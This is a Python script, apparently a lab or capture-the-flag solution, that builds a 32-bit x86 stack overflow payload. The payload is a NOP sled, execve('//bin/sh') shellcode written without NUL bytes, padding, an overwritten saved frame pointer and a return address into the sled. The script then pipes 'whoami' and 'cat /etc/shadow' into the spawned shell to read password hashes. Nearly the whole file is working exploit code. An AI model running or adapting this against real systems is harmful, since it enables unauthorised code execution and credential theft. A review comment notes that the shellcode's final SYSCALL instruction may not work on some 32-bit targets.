from sys import stdout
from sys import argv
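def hex2bytes_le(hexv: int, width: int = 0) -> bytes:
    '''
    Encode a non-negative int as little-endian bytes.

    With ``width`` left at 0 the shortest encoding is used (at least one
    byte). That is what the old ``bytes.fromhex(hex(v)[2:])`` round-trip
    produced for even-length hex values, but the old form raised ValueError
    for odd-length ones (0x123, 0x804a000, and 0 itself); this version handles
    them. Pass ``width=4`` to get a fixed-size x86 pointer, which is what an
    overflow layout needs: a shorter encoding shifts every byte after it.

    Args:
        hexv:  the value to encode, must be >= 0.
        width: number of output bytes, or 0 for the minimal length.

    Returns:
        ``hexv`` as little-endian bytes.

    Raises:
        ValueError:    ``hexv`` is negative.
        OverflowError: ``hexv`` does not fit in ``width`` bytes.
    '''
    if hexv < 0:
        raise ValueError('hex2bytes_le: value must be non-negative')
    if width <= 0:
        # Minimal length, one byte minimum so that 0 encodes as b'\x00'.
        width = max(1, (hexv.bit_length() + 7) // 8)
    return hexv.to_bytes(width, 'little')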
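def exploit(bufaddr: int, ebp: int, saved_fp: int, bufsize: int) -> bytes:
    '''
    Build the stack-overflow payload for a 32-bit x86 target.

    Layout, starting at the first byte of the vulnerable buffer:

        [NOP sled][shellcode]   bufsize bytes in total
        [0x20 padding]          up to the saved frame pointer at ``ebp``
        [saved_fp]              4 bytes, overwrites the old EBP
        [bufaddr + 1]           4 bytes, overwrites the return address
        [0x0a]                  newline ending the line the target reads

    Args:
        bufaddr:  stack address of the start of the buffer (where the sled lands).
        ebp:      stack address of the saved frame pointer of the vulnerable frame.
        saved_fp: value written over the saved frame pointer.
        bufsize:  size of the vulnerable buffer in bytes. The padding is now
                  computed from it instead of a hard-coded 64, so other buffer
                  sizes work (identical result for bufsize == 64).

    Returns:
        The raw payload as bytes (the previous ``list[int]`` annotation was wrong).

    Raises:
        ValueError:    the shellcode leaves no room for a NOP, ``ebp`` lies before
                       the end of the buffer, or one of the two pointers contains
                       a 0x0a byte (it would end the input line before the
                       overflow is complete).
        OverflowError: ``saved_fp`` or ``bufaddr + 1`` does not fit in 32 bits.
    '''
    nop = b'\x90'
    # execve("//bin/sh", NULL, NULL) for 32-bit Linux, written without NUL
    # bytes: syscall number 11 is obtained as 0x424c86f9 - 0x424c86ef + 1.
    # NOTE(review): the last two bytes are 0f 05 (SYSCALL), not cd 80
    # (int 0x80). A 32-bit process can only use SYSCALL where the CPU and
    # kernel accept it in compatibility mode -- confirm on the target before
    # relying on it.
    shellcode = b'\x31\xc0\x50\xb8\x6e\x2f\x73\x68\x50\xb8\x2f\x2f\x62\x69\x50\xb8\xf9\x86\x4c\x42\x2d\xef\x86\x4c\x42\x83\xc0\x01\x89\xe3\x31\xc9\x31\xd2\x0f\x05'
    sledlen = bufsize - len(shellcode)  # NOP sled length
    # The return address is bufaddr + 1, so at least one NOP is needed for it
    # to land on the sled (or on the first shellcode byte); a negative length
    # would otherwise silently produce an empty sled and a broken layout.
    if sledlen < 1:
        raise ValueError(f'shellcode ({len(shellcode)} bytes) does not fit in a {bufsize}-byte buffer')
    dist = ebp - bufaddr   # distance from the buffer start to the saved frame pointer
    pad = dist - bufsize   # filler between the end of the buffer and the old EBP
    if pad < 0:
        raise ValueError(f'ebp ({ebp:#x}) must lie at or after bufaddr + bufsize ({bufaddr + bufsize:#x})')
    # Both pointers are written as exactly 4 little-endian bytes: a shorter
    # encoding would shift the return address out of its slot.
    old_ebp = saved_fp.to_bytes(4, 'little')
    # bufaddr ends in a NUL byte, but bufaddr + 1 (name[1], the second NOP of
    # the sled) works just as well as the return address and has no NUL.
    retaddr = (bufaddr + 1).to_bytes(4, 'little')
    # The payload is newline-terminated, i.e. the target reads a line; an
    # embedded newline would truncate the overflow.
    if b'\x0a' in old_ebp or b'\x0a' in retaddr:
        raise ValueError('a pointer contains a newline byte; the target would stop reading early')
    return nop * sledlen + shellcode + b'\x20' * pad + old_ebp + retaddr + b'\x0a'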
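def main() -> None:
    '''
    Command-line entry point.

    Usage: ``exploit.py BUFADDR EBP SAVED_FP [BUFSIZE]``. The first three
    arguments are hexadecimal stack addresses; BUFSIZE is the buffer size
    (default 64, decimal or 0x-prefixed). The payload is written to stdout,
    followed by the commands to run in the shell the shellcode spawns, so the
    output is meant to be piped into the vulnerable program.

    Exits with status 1 and a usage message when arguments are missing or
    not valid numbers.
    '''
    usage = f'usage: {argv[0]} BUFADDR EBP SAVED_FP [BUFSIZE]   (addresses in hex)'
    if len(argv) < 4:
        # SystemExit with a message prints it to stderr and exits with status 1.
        raise SystemExit(usage)
    try:
        bufaddr, ebp, saved_fp = (int(a, base=16) for a in argv[1:4])
        bufsize = int(argv[4], base=0) if len(argv) > 4 else 64
    except ValueError as err:
        raise SystemExit(f'{usage}\n{err}') from err
    out = stdout.buffer
    out.write(exploit(bufaddr, ebp, saved_fp, bufsize))
    # Commands for the spawned shell, written through the same binary stream
    # so that the text layer cannot reorder them ahead of the payload.
    out.write(b'whoami\n')
    out.write(b'cat /etc/shadow\n')
    out.flush()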
# Script entry point; see ``main`` for the expected arguments.
if __name__ == '__main__':
    main()